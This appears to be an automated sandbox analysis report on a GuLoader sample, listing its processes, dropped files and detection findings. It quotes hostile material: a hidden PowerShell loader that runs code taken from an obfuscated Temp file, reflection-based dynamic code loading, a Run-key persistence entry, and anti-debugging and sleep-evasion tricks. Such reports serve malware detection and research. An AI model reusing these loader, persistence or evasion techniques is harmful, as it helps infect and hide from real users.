Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: 16042024124521.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2393562769.0000000007605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2877935687.0000000000FFE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Core.pdbDZ source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Kanels.exe, Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000001.00000002.2393562769.0000000007613000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.2395946843.000000000AC89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2486243322.00000000035E9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Musicerede $Piecer $Lipotropism), (Silurian @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vrtshusholder28 = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Diviningly)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($modeskaber, $false).DefineType($Dyrevenners, $
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Suspicious powershell command line found
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA225F pushad ; ret 7_2_22CA27F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA27FA pushad ; ret 7_2_22CA27F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA283D push eax; iretd 7_2_22CA2858
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD09AD push ecx; mov dword ptr [esp], ecx 7_2_22CD09B6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA1200 push edx; retf 0022h 7_2_22CA1206
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA135E push eax; iretd 7_2_22CA1369
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA1BC7 push eax; retf 7_2_22CA1BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA1BB7 push eax; retf 7_2_22CA1BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA18A7 push ds; retf 7_2_22CA198E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA19DB push 262822DCh; retf 7_2_22CA19EA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0371225F pushad ; ret 12_2_037127F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037127FA pushad ; ret 12_2_037127F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037409AD push ecx; mov dword ptr [esp], ecx 12_2_037409B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0371283D push eax; iretd 12_2_03712858
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03711368 push eax; iretd 12_2_03711369
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D20270 push edi; iretd 12_2_02D20278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D20268 push edi; iretd 12_2_02D20278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D08208 push ds; retf 12_2_02D0820A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D103D1 push E16F236Ah; retn 0031h 12_2_02D103D6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D143C0 push edi; retf 12_2_02D143CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1039F push ss; ret 12_2_02D103C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D20046 push FFFFFF8Ch; iretd 12_2_02D20077
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D121B0 push esi; retf 12_2_02D121BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D2067E push ecx; ret 12_2_02D206AE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1CBAE push eax; retf 12_2_02D1CBB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D14FC8 pushfd ; retf 12_2_02D14FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1B681 push ebp; ret 12_2_02D1B68C
Drops PE files
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Kanels.exe Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Slavocracy Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Slavocracy Jump to behavior
Source: C:\Users\user\Desktop\16042024124521.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1096E rdtsc 7_2_22D1096E
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5967 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3766 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\16042024124521.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 2.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1B880 FindFirstFileW,FindNextFileW,FindClose, 12_2_02D1B880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: Kanels.exe, 00000007.00000003.2387899164.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2511079073.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Kanels.exe, 00000007.00000003.2387899164.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2511079073.0000000006FBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Users\user\Desktop\16042024124521.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\16042024124521.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D1096E rdtsc 7_2_22D1096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12B60 NtClose,LdrInitializeThunk, 7_2_22D12B60
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA62D6 mov eax, dword ptr fs:[00000030h] 7_2_22DA62D6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDA2C3 mov eax, dword ptr fs:[00000030h] 7_2_22CDA2C3
